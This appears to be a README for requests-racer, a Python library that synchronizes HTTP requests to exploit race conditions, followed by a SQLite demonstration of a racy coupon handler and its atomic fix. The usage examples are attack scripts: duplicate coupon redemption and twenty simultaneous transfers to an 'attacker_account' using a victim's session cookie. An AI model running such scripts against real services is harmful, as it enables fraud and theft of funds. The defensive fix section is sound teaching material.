Description
requests-racer is a small Python library that makes it easy to exploit race conditions in web applications using the Python Requests library. It synchronizes multiple requests to arrive at the server simultaneously, maximizing the chance of triggering TOCTOU bugs.
Installation
```bash
pip3 install requests-racer
```
Basic Usage
```python
from requests_racer import SynchronizedSession

s = SynchronizedSession()

# Queue multiple requests
resp1 = s.get('https://target.com/api/redeem?code=DISCOUNT50', stream=True)
resp2 = s.get('https://target.com/api/redeem?code=DISCOUNT50', stream=True)

# Fire simultaneously
s.finish_all()

# Check responses
print(resp1.status_code, resp1.text)
print(resp2.status_code, resp2.text)
```
Advanced Usage
```python
from requests_racer import SynchronizedSession

s = SynchronizedSession()

# Race condition on money transfer
responses = []
for i in range(20):
    r = s.post('https://target.com/api/transfer',
               json={"amount": 100, "to": "attacker_account"},
               cookies={"session": "victim_session"},
               stream=True)
    responses.append(r)

s.finish_all()

# Check how many succeeded
for r in responses:
    print(f"Status: {r.status_code}, Body: {r.text[:100]}")
```
Common Workflows
```python
# Test coupon redemption race
# If 2+ responses show "Coupon applied", it's vulnerable

# Test voting system
# If multiple votes register, rate limiting is bypassable

# Test account balance
# Send simultaneous withdrawals exceeding balance
```
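The coupon-redemption workflow above is the classic TOCTOU shape from the Description. The following is an added example, not code from requests-racer or from this page: it models the server side of that endpoint against SQLite so you can see why two "Coupon applied" responses mean the handler is vulnerable, and what the fix looks like. The schema, the `redeem_vulnerable`, `redeem_hardened` and `race` functions are all constructed here; `race` releases its workers together to stand in for what `finish_all()` does over HTTP.

```python
import contextlib
import os
import sqlite3
import tempfile
import threading
import time

def make_db():
    # Constructed fixture: one single-use coupon, named after the page's DISCOUNT50 code.
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    with contextlib.closing(sqlite3.connect(path)) as con:
        con.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, used INTEGER NOT NULL)")
        con.execute("INSERT INTO coupons VALUES ('DISCOUNT50', 0)")
        con.commit()
    return path

def redeem_vulnerable(path, code):
    # Check-then-act: the SELECT and the UPDATE are separate statements, so every
    # request that reads used=0 before the first UPDATE lands also "applies" the coupon.
    with contextlib.closing(sqlite3.connect(path, timeout=5, isolation_level=None)) as con:
        row = con.execute("SELECT used FROM coupons WHERE code=?", (code,)).fetchone()
        if row is None or row[0]:
            return False
        time.sleep(0.01)  # widens the window; real handlers have one anyway (validation, logging)
        con.execute("UPDATE coupons SET used=1 WHERE code=?", (code,))
        return True

def redeem_hardened(path, code):
    # One conditional UPDATE: the database checks used=0 and sets used=1 atomically,
    # so exactly one request observes rowcount == 1 however many arrive at once.
    with contextlib.closing(sqlite3.connect(path, timeout=5, isolation_level=None)) as con:
        cur = con.execute("UPDATE coupons SET used=1 WHERE code=? AND used=0", (code,))
        return cur.rowcount == 1

def race(handler, n=20, code="DISCOUNT50"):
    """Release n concurrent redemptions at the same instant and return how many
    reported success. A correct handler returns 1; a racy one returns more."""
    path = make_db()
    results = []
    start = threading.Barrier(n)
    def worker():
        start.wait()  # every thread blocks here until all n are ready, then they go together
        results.append(handler(path, code))
    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads: t.start()
    for t in threads: t.join()
    os.remove(path)
    return sum(results)
```

Running `race(redeem_vulnerable)` typically reports most or all 20 redemptions as applied, while `race(redeem_hardened)` always reports exactly 1; the same atomic-conditional-write pattern (or a row lock / unique constraint) is the fix for the transfer and withdrawal cases too.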